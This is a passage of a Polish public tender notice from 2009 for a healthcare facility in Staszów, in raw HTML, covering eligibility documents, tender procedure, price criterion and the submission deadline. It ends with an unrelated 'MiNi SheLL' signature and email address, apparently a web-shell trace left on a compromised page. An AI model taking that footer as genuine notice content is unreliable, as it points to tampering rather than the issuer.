6.	Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.

7.	Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę/osoby uprawnioną do podpisania oferty z dopiskiem za zgodność z oryginałem.


Każda strona oferty winna być zaparafowana przez osobę uprawnioną..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spzzoz.info.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Staszowie.
ul. 11 Listopada 78
28 - 200 Staszów..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2009 godzina 11:00, miejsce: Sekretariat Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Staszowie.
ul. 11 Listopada 78
28 - 200 Staszów..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Regionalny dla Województwa Świętokrzyskiego.

Creat By MiNi SheLL
Email: jattceo@gmail.com